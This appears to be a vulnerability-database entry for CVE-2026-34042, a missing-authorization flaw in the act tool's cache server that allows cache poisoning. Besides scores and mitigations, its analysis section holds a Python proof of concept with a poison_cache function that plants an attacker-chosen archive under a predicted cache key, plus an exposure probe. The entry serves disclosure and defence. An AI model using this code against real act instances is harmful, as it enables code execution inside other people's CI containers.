
CVE-2026-34042

Severity: High
Published: 31 March 2026
Modified: 16 April 2026
KEV Added: not listed
Patch: available (act v0.2.86)
CVSS Score v3.1: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
EPSS Score: 0.0046 (36.4th percentile)
Risk Priority: 55 (floored blend · peak EPSS)

Summary

CVE-2026-34042 is a high-severity Missing Authorization (CWE-862) vulnerability in act, the tool for running GitHub Actions locally. The affected project is inferred from the advisory text and references, since NVD filed no CPE; a Forgejo runner issue is among those references. Its CVSS v3.1 base score is 8.2 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). Its EPSS score of 0.0046 places it at the 36.4th percentile for exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and CM-7 (Least Functionality).

Deeper analysis

CVE-2026-34042 affects the "act" project, an open-source tool for running GitHub Actions locally. In versions prior to 0.2.86, the built-in actions/cache server listens on all network interfaces rather than on loopback only, and it performs no authorization of callers (CWE-862: Missing Authorization). Any party that can connect to the port can create caches with arbitrary keys and retrieve every existing cache, with no authentication at any step.

A remote attacker who can reach the cache server, even from the internet, needs no credentials. Cache keys are normally built from values an attacker can read or compute from the workflow file (often public), such as the runner OS and a hash of a lockfile, so predicting the key a local workflow will restore is realistic. The attacker uploads a malicious archive under that key; when act next restores it, the attacker's files land in the job's working tree and can run as part of the build, giving arbitrary code execution inside the Docker container that runs the actions. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N) reflects this: network-reachable with no privileges, but dependent on a user action (UI:R), namely the victim running a workflow that restores the poisoned key, with impact that crosses from the cache server into the job container (S:C).
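The exchange described above, as an added example that is not part of this page or of the act project's code. It assumes the cache server speaks the actions/cache v1 REST API that actions/toolkit's client uses (POST /caches to reserve, PATCH /caches/{id} to upload, POST /caches/{id} to commit, GET /cache?keys=&version= to restore); the server class is a constructed, unauthenticated stand-in bound to loopback so the demo stays local, and the key, version and payload are constructed. The attacker side (poison_cache) and the victim side (restore_cache) are both shown, and is_exposed is the probe a practitioner would run against a real host.

```python
# Added example, not code from the act project. Assumes the server speaks the actions/cache
# v1 REST API used by actions/toolkit's client (POST /caches reserve, PATCH /caches/{id} upload,
# POST /caches/{id} commit, GET /cache?keys=&version= restore). The server class below is a
# constructed, unauthenticated stand-in bound to loopback; key, version and payload are constructed.
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, quote, urlparse

API = "/_apis/artifactcache"


class ConstructedCacheServer(BaseHTTPRequestHandler):
    """Stand-in for the vulnerable behaviour: every request is served, no caller is ever checked."""
    store = {}      # cache_id -> {"key", "version", "data", "committed"}
    counter = [0]

    def log_message(self, *args):
        pass        # keep the demo quiet

    def _reply(self, code, body=b"", ctype="application/json"):
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _body(self):
        return self.rfile.read(int(self.headers.get("Content-Length", 0)))

    def _cache_id(self):
        return int(urlparse(self.path).path.rsplit("/", 1)[1])

    def do_GET(self):
        url = urlparse(self.path)
        if url.path == API + "/cache":               # restore lookup: first committed entry for a key
            q = parse_qs(url.query)
            keys, version = q.get("keys", [""])[0].split(","), q.get("version", [""])[0]
            for cid, e in self.store.items():
                if e["committed"] and e["version"] == version and e["key"] in keys:
                    loc = f"http://{self.headers['Host']}{API}/artifacts/{cid}"
                    return self._reply(200, json.dumps({"cacheKey": e["key"], "archiveLocation": loc}).encode())
            return self._reply(204)
        if url.path.startswith(API + "/artifacts/"):  # archive download
            return self._reply(200, self.store[self._cache_id()]["data"], "application/octet-stream")
        self._reply(404)

    def do_POST(self):
        url = urlparse(self.path)
        if url.path == API + "/caches":               # reserve: anyone may claim any key
            req = json.loads(self._body())
            self.counter[0] += 1
            self.store[self.counter[0]] = {"key": req["key"], "version": req["version"], "data": b"", "committed": False}
            return self._reply(201, json.dumps({"cacheId": self.counter[0]}).encode())
        if url.path.startswith(API + "/caches/"):     # commit
            self._body()
            self.store[self._cache_id()]["committed"] = True
            return self._reply(204)
        self._reply(404)

    def do_PATCH(self):                               # upload archive bytes
        self.store[self._cache_id()]["data"] += self._body()
        self._reply(204)


def _call(method, url, data=None, headers=None):
    req = urllib.request.Request(url, data=data, method=method, headers=headers or {})
    with urllib.request.urlopen(req, timeout=5) as resp:
        return resp.status, resp.read()


def is_exposed(base):
    """Probe: an unauthenticated 200/204 to a restore lookup means anyone reaching the port can use it."""
    try:
        return _call("GET", f"{base}{API}/cache?keys=probe&version=probe")[0] in (200, 204)
    except (urllib.error.HTTPError, urllib.error.URLError, OSError):
        return False


def poison_cache(base, key, version, payload):
    """Attacker: reserve, upload and commit an attacker-chosen archive under a predicted key."""
    reserve = json.dumps({"key": key, "version": version, "cacheSize": len(payload)}).encode()
    cid = json.loads(_call("POST", f"{base}{API}/caches", reserve, {"Content-Type": "application/json"})[1])["cacheId"]
    _call("PATCH", f"{base}{API}/caches/{cid}", payload,
          {"Content-Type": "application/octet-stream", "Content-Range": f"bytes 0-{len(payload) - 1}/*"})
    _call("POST", f"{base}{API}/caches/{cid}", json.dumps({"size": len(payload)}).encode(),
          {"Content-Type": "application/json"})
    return cid


def restore_cache(base, keys, version):
    """Victim: what an actions/cache restore step does, lookup then download whatever is served."""
    status, resp = _call("GET", f"{base}{API}/cache?keys={quote(','.join(keys))}&version={version}")
    return None if status == 204 else _call("GET", json.loads(resp)["archiveLocation"])[1]


def demo():
    """End-to-end run; returns (server answered unauthenticated, victim restored the attacker's bytes)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), ConstructedCacheServer)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{srv.server_address[1]}"
    # Constructed key in the usual ${{ runner.os }}-<tool>-${{ hashFiles(lockfile) }} shape, which an
    # attacker can compute from a public workflow file and its lockfile.
    key, version = "Linux-node-5d41402abc4b2a76b9719d911017c592", "constructed-version"
    payload = b"#!/bin/sh\necho attacker-controlled node_modules\n"  # stand-in for a poisoned tarball
    exposed = is_exposed(base)
    poison_cache(base, key, version, payload)
    restored = restore_cache(base, [key, "Linux-node-"], version)
    srv.shutdown()
    return exposed, restored == payload
```

Calling demo() returns (True, True): the victim's restore step receives the attacker's archive because the server matched only the key and never the caller. Against a real instance, run is_exposed from another machine against the host's non-loopback address; anything other than a connection failure or a 401/403 means the server is reachable in the way the advisory describes, and the only safe states are the patched version, a loopback-only bind, or the cache server disabled.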

The vulnerability has been patched in act version 0.2.86, as detailed in the project's GitHub security advisory (GHSA-x34h-54cw-9825), the patching commit (c28c27e141e8b54f9853de82f421ee09846751f7), and the release notes. Security practitioners should upgrade to v0.2.86 or later and review Forgejo runner issue #294 for additional context on related discussions.

Vulnerability details

act is a project which allows for local running of github actions. Prior to version 0.2.86, act's built in actions/cache server listens to connections on all interfaces and allows anyone who can connect to it including someone anywhere on the internet to create caches with arbitrary keys and retrieve all existing caches. If they can predict which cache keys will be used by local actions, they can create malicious caches containing whatever files they please most likely allowing arbitrary remote code execution within the docker container. This issue has been patched in version 0.2.86.

CWE(s)

CWE-862 Missing Authorization

Related Threats

MITRE ATT&CK Enterprise Techniques

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Why these techniques?

The vulnerability exposes an unauthenticated cache server on all interfaces (CWE-862), directly enabling remote exploitation for cache poisoning and subsequent RCE, mapping to T1190 Exploit Public-Facing Application.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2025-69311 (shared CWE-862)
CVE-2026-3266 (shared CWE-862)
CVE-2026-45438 (shared CWE-862)
CVE-2025-23477 (shared CWE-862)
CVE-2025-68834 (shared CWE-862)
CVE-2026-22663 (shared CWE-862)
CVE-2024-12544 (shared CWE-862)
CVE-2024-50967 (shared CWE-862)
CVE-2025-68059 (shared CWE-862)
CVE-2025-14070 (shared CWE-862)

Affected Assets

act, versions prior to 0.2.86 (built-in actions/cache server)
Inferred from the advisory description and references, which also cite Forgejo runner issue #294; NVD did not file a CPE for this CVE

Mitigating Controls (NIST 800-53 r5)

CM-6 Configuration Settings (prevent)

Establishes and enforces a secure configuration for the act cache server so that it binds only to localhost, directly preventing exposure to remote unauthorized access.

CM-7 Least Functionality (prevent)

Restricts act to the functionality it needs by disabling, or limiting, the network-listening capability of the built-in cache server, eliminating unnecessary exposure.

SC-7 Boundary Protection (prevent)

Implements boundary protection, such as a host-based firewall rule that blocks inbound connections to the act cache server port, so that remote exploitation is blocked even if the bind address is left at its default.
